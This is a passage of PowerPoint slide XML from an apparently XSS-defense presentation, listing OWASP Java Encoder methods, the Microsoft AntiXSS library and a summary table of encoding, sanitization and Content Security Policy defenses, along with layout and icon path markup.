              <a:t>Encode#forJavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>(String) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Encode#forJavaScriptAttribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>(String)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Encode#forJavaScriptBlock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>(String)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Encode#forJavaScriptSource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>(String)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="5077401"/>
            <a:ext cx="4114800" cy="621359"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="18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7A6C62"/>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7A6C62"/>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7A6C62"/>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a:t>URI/URL contexts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>Encode#forUriComponent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>(String)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1371599"/>
            <a:ext cx="8229600" cy="451225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="18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7A6C62"/>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7A6C62"/>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7A6C62"/>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7A6C6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a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>OWASP_Java_Encoder_Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3339195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icrosoftProtectionLibrary.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-2" b="41424"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1763323"/>
            <a:ext cx="8229600" cy="5111496"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DB3D16"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Microsoft Encoder and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>AntiXSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Library</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7495558" y="449496"/>
            <a:ext cx="1191241" cy="1134269"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3243639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307630"/>
            <a:ext cx="8229600" cy="910694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XSS Defense Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="348916" y="1294542"/>
          <a:ext cx="8446168" cy="4550636"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1199147">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1923271">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5323750">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="3582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Data Type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Context</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Defense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Body/Attribute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Entity Encode/HTML Attribute Encode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JavaScript Variable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JavaScript Hex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GET Parameter</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URL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Untrusted</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> URL</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URL Validation,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> avoid JavaScript: URLs, Attribute Encoding, Safe URL Verification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CSS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mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>CSS Hex Encoding</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Anywhere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Sanitization (Server and Client Side)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DOM</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Safe use of JS API's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Untrusted</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> JavaScript</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Sandboxing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> and Deliver from Different Domain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Client Parse Time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err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>JSON.parse</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> or json2.js</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Embedded</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r>
                        <a:rPr lang="en-US" sz="1400" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> Serialization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0"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3224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Mistakes were made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Content Security Policy 3.0</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541382910"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7870004" y="108616"/>
            <a:ext cx="1166117" cy="1185927"/>
            <a:chOff x="6835420" y="635329"/>
            <a:chExt cx="1465134" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="Group 6"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="Oval 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="bg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a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg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8" name="Freeform 1"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7320232" y="881197"/>
              <a:ext cx="495511" cy="973392"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 7748 w 10781"/>
                <a:gd name="T1" fmla="*/ 9164 h 21180"/>
                <a:gd name="T2" fmla="*/ 6087 w 10781"/>
                <a:gd name="T3" fmla="*/ 10781 h 21180"/>
                <a:gd name="T4" fmla="*/ 5795 w 10781"/>
                <a:gd name="T5" fmla="*/ 12668 h 21180"/>
                <a:gd name="T6" fmla="*/ 2538 w 10781"/>
                <a:gd name="T7" fmla="*/ 13273 h 21180"/>
                <a:gd name="T8" fmla="*/ 1617 w 10781"/>
                <a:gd name="T9" fmla="*/ 15722 h 21180"/>
                <a:gd name="T10" fmla="*/ 2785 w 10781"/>
                <a:gd name="T11" fmla="*/ 17429 h 21180"/>
                <a:gd name="T12" fmla="*/ 3010 w 10781"/>
                <a:gd name="T13" fmla="*/ 18799 h 21180"/>
                <a:gd name="T14" fmla="*/ 3100 w 10781"/>
                <a:gd name="T15" fmla="*/ 19360 h 21180"/>
                <a:gd name="T16" fmla="*/ 4851 w 10781"/>
                <a:gd name="T17" fmla="*/ 21179 h 21180"/>
                <a:gd name="T18" fmla="*/ 7209 w 10781"/>
                <a:gd name="T19" fmla="*/ 19787 h 21180"/>
                <a:gd name="T20" fmla="*/ 7434 w 10781"/>
                <a:gd name="T21" fmla="*/ 18799 h 21180"/>
                <a:gd name="T22" fmla="*/ 7456 w 10781"/>
                <a:gd name="T23" fmla="*/ 17743 h 21180"/>
                <a:gd name="T24" fmla="*/ 7928 w 10781"/>
                <a:gd name="T25" fmla="*/ 17429 h 21180"/>
                <a:gd name="T26" fmla="*/ 8849 w 10781"/>
                <a:gd name="T27" fmla="*/ 14105 h 21180"/>
                <a:gd name="T28" fmla="*/ 7726 w 10781"/>
                <a:gd name="T29" fmla="*/ 13273 h 21180"/>
                <a:gd name="T30" fmla="*/ 7905 w 10781"/>
                <a:gd name="T31" fmla="*/ 12129 h 21180"/>
                <a:gd name="T32" fmla="*/ 8107 w 10781"/>
                <a:gd name="T33" fmla="*/ 11477 h 21180"/>
                <a:gd name="T34" fmla="*/ 9163 w 10781"/>
                <a:gd name="T35" fmla="*/ 9635 h 21180"/>
                <a:gd name="T36" fmla="*/ 10421 w 10781"/>
                <a:gd name="T37" fmla="*/ 6266 h 21180"/>
                <a:gd name="T38" fmla="*/ 8669 w 10781"/>
                <a:gd name="T39" fmla="*/ 5884 h 21180"/>
                <a:gd name="T40" fmla="*/ 607 w 10781"/>
                <a:gd name="T41" fmla="*/ 10488 h 21180"/>
                <a:gd name="T42" fmla="*/ 1752 w 10781"/>
                <a:gd name="T43" fmla="*/ 11050 h 21180"/>
                <a:gd name="T44" fmla="*/ 2628 w 10781"/>
                <a:gd name="T45" fmla="*/ 11252 h 21180"/>
                <a:gd name="T46" fmla="*/ 3167 w 10781"/>
                <a:gd name="T47" fmla="*/ 12712 h 21180"/>
                <a:gd name="T48" fmla="*/ 4963 w 10781"/>
                <a:gd name="T49" fmla="*/ 10938 h 21180"/>
                <a:gd name="T50" fmla="*/ 9994 w 10781"/>
                <a:gd name="T51" fmla="*/ 7839 h 21180"/>
                <a:gd name="T52" fmla="*/ 2134 w 10781"/>
                <a:gd name="T53" fmla="*/ 7681 h 21180"/>
                <a:gd name="T54" fmla="*/ 9770 w 10781"/>
                <a:gd name="T55" fmla="*/ 4649 h 21180"/>
                <a:gd name="T56" fmla="*/ 8444 w 10781"/>
                <a:gd name="T57" fmla="*/ 2672 h 21180"/>
                <a:gd name="T58" fmla="*/ 360 w 10781"/>
                <a:gd name="T59" fmla="*/ 7300 h 21180"/>
                <a:gd name="T60" fmla="*/ 2134 w 10781"/>
                <a:gd name="T61" fmla="*/ 4357 h 21180"/>
                <a:gd name="T62" fmla="*/ 7546 w 10781"/>
                <a:gd name="T63" fmla="*/ 2291 h 21180"/>
                <a:gd name="T64" fmla="*/ 6221 w 10781"/>
                <a:gd name="T65" fmla="*/ 337 h 21180"/>
                <a:gd name="T66" fmla="*/ 360 w 10781"/>
                <a:gd name="T67" fmla="*/ 3976 h 2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81" h="21180">
                  <a:moveTo>
                    <a:pt x="7748" y="9164"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7748" y="9164"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7277" y="9410"/>
                    <a:pt x="6895" y="9680"/>
                    <a:pt x="6603" y="10017"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6378" y="10264"/>
                    <a:pt x="6199" y="10534"/>
                    <a:pt x="6087" y="10781"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5907" y="11185"/>
                    <a:pt x="5839" y="11590"/>
                    <a:pt x="5817" y="11904"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5795" y="12218"/>
                    <a:pt x="5795" y="12488"/>
                    <a:pt x="5795" y="12668"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5772" y="12892"/>
                    <a:pt x="5839" y="13094"/>
                    <a:pt x="5951" y="13273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2538" y="13273"/>
                    <a:pt x="2538" y="13273"/>
                    <a:pt x="2538" y="13273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2022" y="13273"/>
                    <a:pt x="1617" y="13656"/>
                    <a:pt x="1617" y="14105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1617" y="15722"/>
                    <a:pt x="1617" y="15722"/>
                    <a:pt x="1617" y="15722"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1617" y="16733"/>
                    <a:pt x="2022" y="17429"/>
                    <a:pt x="2538" y="17429"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2538" y="17429"/>
                    <a:pt x="2651" y="17429"/>
                    <a:pt x="2785" y="17429"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2897" y="17429"/>
                    <a:pt x="3010" y="17563"/>
                    <a:pt x="3010" y="17743"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3010" y="18799"/>
                    <a:pt x="3010" y="18799"/>
                    <a:pt x="3010" y="18799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3032" y="18799"/>
                    <a:pt x="3032" y="18799"/>
                    <a:pt x="3032" y="18799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3010" y="18979"/>
                    <a:pt x="3055" y="19158"/>
                    <a:pt x="3100" y="19360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3234" y="19787"/>
                    <a:pt x="3234" y="19787"/>
                    <a:pt x="3234" y="19787"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3481" y="20550"/>
                    <a:pt x="4222" y="21179"/>
                    <a:pt x="4851" y="21179"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5615" y="21179"/>
                    <a:pt x="5615" y="21179"/>
                    <a:pt x="5615" y="21179"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6244" y="21179"/>
                    <a:pt x="6985" y="20550"/>
                    <a:pt x="7209" y="19787"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7344" y="19360"/>
                    <a:pt x="7344" y="19360"/>
                    <a:pt x="7344" y="19360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7412" y="19158"/>
                    <a:pt x="7434" y="18979"/>
                    <a:pt x="7434" y="18799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7456" y="18799"/>
                    <a:pt x="7456" y="18799"/>
                    <a:pt x="7456" y="18799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7456" y="17743"/>
                    <a:pt x="7456" y="17743"/>
                    <a:pt x="7456" y="17743"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7456" y="17563"/>
                    <a:pt x="7546" y="17429"/>
                    <a:pt x="7680" y="17429"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7928" y="17429"/>
                    <a:pt x="7928" y="17429"/>
                    <a:pt x="7928" y="17429"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8444" y="17429"/>
                    <a:pt x="8849" y="16575"/>
                    <a:pt x="8849" y="15722"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8849" y="14105"/>
                    <a:pt x="8849" y="14105"/>
                    <a:pt x="8849" y="14105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8849" y="13656"/>
                    <a:pt x="8444" y="13273"/>
                    <a:pt x="7928" y="13273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7726" y="13273"/>
                    <a:pt x="7726" y="13273"/>
                    <a:pt x="7726" y="13273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7816" y="13139"/>
                    <a:pt x="7883" y="12959"/>
                    <a:pt x="7883" y="12780"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7905" y="12510"/>
                    <a:pt x="7905" y="12308"/>
                    <a:pt x="7905" y="12129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7928" y="11993"/>
                    <a:pt x="7928" y="11904"/>
                    <a:pt x="7951" y="11814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7995" y="11679"/>
                    <a:pt x="8017" y="11590"/>
                    <a:pt x="8107" y="11477"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8220" y="11365"/>
                    <a:pt x="8377" y="11207"/>
                    <a:pt x="8714" y="11050"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9231" y="10781"/>
                    <a:pt x="9432" y="10151"/>
                    <a:pt x="9163" y="9635"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8894" y="9119"/>
                    <a:pt x="8265" y="8894"/>
                    <a:pt x="7748" y="9164"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10421" y="6266"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10421" y="6266"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10061" y="5727"/>
                    <a:pt x="9253" y="5547"/>
                    <a:pt x="8669" y="5884"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1034" y="8917"/>
                    <a:pt x="1034" y="8917"/>
                    <a:pt x="1034" y="8917"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="427" y="9231"/>
                    <a:pt x="225" y="9949"/>
                    <a:pt x="607" y="10488"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="854" y="10871"/>
                    <a:pt x="1303" y="11050"/>
                    <a:pt x="1752" y="11050"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1752" y="11050"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1932" y="11050"/>
                    <a:pt x="2134" y="11073"/>
                    <a:pt x="2291" y="11117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2426" y="11163"/>
                    <a:pt x="2538" y="11207"/>
                    <a:pt x="2628" y="11252"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2763" y="11365"/>
                    <a:pt x="2875" y="11454"/>
                    <a:pt x="2987" y="11679"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3077" y="11881"/>
                    <a:pt x="3167" y="12195"/>
                    <a:pt x="3167" y="12712"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5278" y="12712"/>
                    <a:pt x="5278" y="12712"/>
                    <a:pt x="5278" y="12712"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5278" y="12039"/>
                    <a:pt x="5166" y="11454"/>
                    <a:pt x="4963" y="10938"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4829" y="10601"/>
                    <a:pt x="4627" y="10309"/>
                    <a:pt x="4424" y="10062"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9994" y="7839"/>
                    <a:pt x="9994" y="7839"/>
                    <a:pt x="9994" y="7839"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10600" y="7502"/>
                    <a:pt x="10780" y="6805"/>
                    <a:pt x="10421" y="6266"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2134" y="7681"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2134" y="7681"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9770" y="4649"/>
                    <a:pt x="9770" y="4649"/>
                    <a:pt x="9770" y="4649"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10376" y="4313"/>
                    <a:pt x="10556" y="3616"/>
                    <a:pt x="10196" y="3077"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9837" y="2516"/>
                    <a:pt x="9029" y="2358"/>
                    <a:pt x="8444" y="2672"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="809" y="5727"/>
                    <a:pt x="809" y="5727"/>
                    <a:pt x="809" y="5727"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="6042"/>
                    <a:pt x="0" y="6761"/>
                    <a:pt x="360" y="7300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="741" y="7839"/>
                    <a:pt x="1527" y="8018"/>
                    <a:pt x="2134" y="7681"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2134" y="4357"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2134" y="4357"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7546" y="2291"/>
                    <a:pt x="7546" y="2291"/>
                    <a:pt x="7546" y="2291"/>
